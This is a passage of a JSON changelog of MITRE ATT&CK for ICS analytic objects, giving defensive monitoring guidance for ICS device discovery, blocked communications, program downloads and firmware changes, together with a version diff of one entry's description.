                    "description": "Monitor for anomalies related to discovery related ICS functions, including devices that have not previously used these functions or for functions being sent to many outstations.\n\nMonitor for new ICS protocol connections to existing assets or for device scanning (i.e., a host connecting to many devices) over ICS and enterprise protocols (e.g., ICMP, DCOM, WinRM). For added context on adversary enterprise procedures and background see [Remote System Discovery](https://attack.mitre.org/techniques/T1018).\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "Network Traffic",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--3f052beb-d384-4ebe-b942-2c4ddeb95833",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 21:47:06.445000+00:00",
                    "modified": "2026-04-24 20:33:55.408000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0910#AN2053",
                            "external_id": "AN2053"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2053",
                    "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist, alarms may still be visible even if messages are blocked.\n\nMonitor for a loss of network communications, which may indicate this technique is being used.\n\nMonitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution but instead may provide additional evidence that the technique has been used and may complement other detections.\n\nMonitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.\n\nMonitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
                            "name": "Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
                            "name": "Process",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--df7f8849-56a7-4e83-9fd7-a4f25227d960",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 22:41:28.415000+00:00",
                    "modified": "2026-04-24 20:34:02.593000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0911#AN2054",
                            "external_id": "AN2054"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2054",
                    "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist, alarms may still be visible even if Ethernet messages are blocked.\n\nMonitor for a loss of network communications, which may indicate this technique is being used.\n\nMonitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution but instead may provide additional evidence that the technique has been used and may complement other detections.\n\nMonitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.\n\nMonitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
                            "name": "Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
                            "name": "Process",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--0b4e7cfa-9f9d-49b0-b5bf-afdf62058c5a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 22:55:44.526000+00:00",
                    "modified": "2026-04-24 20:33:52.139000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0912#AN2055",
                            "external_id": "AN2055"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2055",
                    "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist, alarms may still be visible even if Wi-Fi messages are blocked.\n\nMonitor for a loss of network communications, which may indicate this technique is being used.\n\nMonitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.\n\nMonitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.\n\nMonitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
                            "name": "Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
                            "name": "Process",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--e379be82-39d7-4ae4-8557-f846ba19cd4b",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 00:08:52.524000+00:00",
                    "modified": "2026-04-24 20:34:02.964000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0913#AN2056",
                            "external_id": "AN2056"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2056",
                    "description": "Monitor device alarms for program downloads, although not all devices produce such alarms.\n\nMonitor for protocol functions related to program download or modification. Program downloads may be observable in ICS automation protocols and remote management protocols.\n\nConsult asset management systems to understand expected program versions.\n\nMonitor devices configuration logs which may contain alerts that indicate whether a program download has occurred. Devices may maintain application logs that indicate whether a full program download, online edit, or program append function has occurred.\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706",
                            "name": "Asset",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--3c6aa6f7-29e9-41d9-8500-30b6d0533d64",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 00:31:46.350000+00:00",
                    "modified": "2026-04-24 20:33:55.025000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0914#AN2057",
                            "external_id": "AN2057"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2057",
                    "description": "Monitor device alarms for program downloads, although not all devices produce such alarms.\n\nMonitor for protocol functions related to program download or modification. Program downloads may be observable in ICS automation protocols and remote management protocols.\n\nConsult asset management systems to understand expected program versions.\n\nMonitor devices configuration logs which may contain alerts that indicate whether a program download has occurred. Devices may maintain application logs that indicate whether a full program download, online edit, or program append function has occurred.\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706",
                            "name": "Asset",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--22b202f2-d4dd-44dd-b5e1-791ff2aef8ed",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 00:42:36.732000+00:00",
                    "modified": "2026-04-24 20:33:53.216000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0915#AN2058",
                            "external_id": "AN2058"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2058",
                    "description": "Monitor device alarms for program downloads, although not all devices produce such alarms.\n\nMonitor for protocol functions related to program download or modification. Program downloads may be observable in ICS automation protocols and remote management protocols.\n\nConsult asset management systems to understand expected program versions.\n\nMonitor devices configuration logs which may contain alerts that indicate whether a program download has occurred. Devices may maintain application logs that indicate whether a full program download, online edit, or program append function has occurred.\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706",
                            "name": "Asset",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                }
            ],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--3f10ffe9-fa73-4aeb-bf98-322831bf757f",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:33:55.812000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0731#AN1864",
                            "external_id": "AN1864"
                        },
                        {
                            "source_name": "McAfee CHIPSEC Blog",
                            "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.",
                            "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/"
                        },
                        {
                            "source_name": "MITRE Copernicus",
                            "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.",
                            "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about"
                        },
                        {
                            "source_name": "Intel HackingTeam UEFI Rootkit",
                            "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html"
                        },
                        {
                            "source_name": "Github CHIPSEC",
                            "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.",
                            "url": "https://github.com/chipsec/chipsec"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1864",
                    "description": "Monitor for firmware changes which may be observable via operational alarms from devices.\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd",
                            "name": "Firmware",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Network Traffic",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:33:55.812000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Monitor for firmware changes which may be observable via operational alarms from devices.\\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)\\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\", \"old_value\": \"Monitor for firmware changes which may be observable via operational alarms from devices.\\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)\\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1,4 @@\\n Monitor for firmware changes which may be observable via operational alarms from devices.\\n Monitor device application logs for firmware changes, although not all devices will produce such logs.\\n-Monitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog) (Citation: Github CHIPSEC) (Citation: Intel HackingTeam UEFI Rootkit)\\n+Monitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)\\n Monitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to213__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to213__0\"><a href=\"#difflib_chg_to213__top\">t</a></td><td class=\"diff_header\" id=\"from213_1\">1</td><td nowrap=\"nowrap\">Monitor&nbsp;for&nbsp;firmware&nbsp;changes&nbsp;which&nbsp;may&nbsp;be&nbsp;observable&nbsp;via&nbsp;ope</td><td class=\"diff_next\"><a href=\"#difflib_chg_to213__top\">t</a></td><td class=\"diff_header\" id=\"to213_1\">1</td><td nowrap=\"nowrap\">Monitor&nbsp;for&nbsp;firmware&nbsp;changes&nbsp;which&nbsp;may&nbsp;be&nbsp;observable&nbsp;via&nbsp;ope</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rational&nbsp;alarms&nbsp;from&nbsp;devices.&nbsp;Monitor&nbsp;device&nbsp;application&nbsp;log</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rational&nbsp;alarms&nbsp;from&nbsp;devices.&nbsp;Monitor&nbsp;device&nbsp;application&nbsp;log</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;for&nbsp;firmware&nbsp;changes,&nbsp;although&nbsp;not&nbsp;all&nbsp;devices&nbsp;will&nbsp;produc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;for&nbsp;firmware&nbsp;changes,&nbsp;although&nbsp;not&nbsp;all&nbsp;devices&nbsp;will&nbsp;produc</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;such&nbsp;logs.&nbsp;Monitor&nbsp;firmware&nbsp;for&nbsp;unexpected&nbsp;changes.&nbsp;Asset&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;such&nbsp;logs.&nbsp;Monitor&nbsp;firmware&nbsp;for&nbsp;unexpected&nbsp;changes.&nbsp;Asset&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">management&nbsp;systems&nbsp;should&nbsp;be&nbsp;consulted&nbsp;to&nbsp;understand&nbsp;known-g</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">management&nbsp;systems&nbsp;should&nbsp;be&nbsp;consulted&nbsp;to&nbsp;understand&nbsp;known-g</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ood&nbsp;firmware&nbsp;versions.&nbsp;Dump&nbsp;and&nbsp;inspect&nbsp;BIOS&nbsp;images&nbsp;on&nbsp;vulne</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ood&nbsp;firmware&nbsp;versions.&nbsp;Dump&nbsp;and&nbsp;inspect&nbsp;BIOS&nbsp;images&nbsp;on&nbsp;vulne</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rable&nbsp;systems&nbsp;and&nbsp;compare&nbsp;against&nbsp;known&nbsp;good&nbsp;images.(Citatio</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rable&nbsp;systems&nbsp;and&nbsp;compare&nbsp;against&nbsp;known&nbsp;good&nbsp;images.(Citatio</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;MITRE&nbsp;Copernicus)&nbsp;Analyze&nbsp;differences&nbsp;to&nbsp;determine&nbsp;if&nbsp;mal</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n:&nbsp;MITRE&nbsp;Copernicus)&nbsp;Analyze&nbsp;differences&nbsp;to&nbsp;determine&nbsp;if&nbsp;mal</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">icious&nbsp;changes&nbsp;have&nbsp;occurred.&nbsp;Log&nbsp;attempts&nbsp;to&nbsp;read/write&nbsp;to&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">icious&nbsp;changes&nbsp;have&nbsp;occurred.&nbsp;Log&nbsp;attempts&nbsp;to&nbsp;read/write&nbsp;to&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">BIOS&nbsp;and&nbsp;compare&nbsp;against&nbsp;known&nbsp;patching&nbsp;behavior.&nbsp;Likewise,&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">BIOS&nbsp;and&nbsp;compare&nbsp;against&nbsp;known&nbsp;patching&nbsp;behavior.&nbsp;Likewise,&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">EFI&nbsp;modules&nbsp;can&nbsp;be&nbsp;collected&nbsp;and&nbsp;compared&nbsp;against&nbsp;a&nbsp;known-cl</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">EFI&nbsp;modules&nbsp;can&nbsp;be&nbsp;collected&nbsp;and&nbsp;compared&nbsp;against&nbsp;a&nbsp;known-cl</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ean&nbsp;list&nbsp;of&nbsp;EFI&nbsp;executable&nbsp;binaries&nbsp;to&nbsp;detect&nbsp;potentially&nbsp;ma</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ean&nbsp;list&nbsp;of&nbsp;EFI&nbsp;executable&nbsp;binaries&nbsp;to&nbsp;detect&nbsp;potentially&nbsp;ma</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">licious&nbsp;modules.&nbsp;The&nbsp;CHIPSEC&nbsp;framework&nbsp;can&nbsp;be&nbsp;used&nbsp;for&nbsp;analy</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">licious&nbsp;modules.&nbsp;The&nbsp;CHIPSEC&nbsp;framework&nbsp;can&nbsp;be&nbsp;used&nbsp;for&nbsp;analy</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sis&nbsp;to&nbsp;determine&nbsp;if&nbsp;firmware&nbsp;modifications&nbsp;have&nbsp;been&nbsp;perform</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">sis&nbsp;to&nbsp;determine&nbsp;if&nbsp;firmware&nbsp;modifications&nbsp;have&nbsp;been&nbsp;perform</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed.(Citation:&nbsp;McAfee&nbsp;CHIPSEC&nbsp;Blog)<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Github&nbsp;CHIPSEC</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ed.(Citation:&nbsp;McAfee&nbsp;CHIPSEC&nbsp;Blog)(Citation:&nbsp;Github&nbsp;CHIPSEC)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)<span class=\"diff_sub\">&nbsp;</span>(Citation:&nbsp;Intel&nbsp;HackingTeam&nbsp;UEFI&nbsp;Rootkit)&nbsp;Monitor&nbsp;ICS&nbsp;man</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(Citation:&nbsp;Intel&nbsp;HackingTeam&nbsp;UEFI&nbsp;Rootkit)&nbsp;Monitor&nbsp;ICS&nbsp;manag</td></tr>\n            <tr><td class=\"diff_next\"></td><td 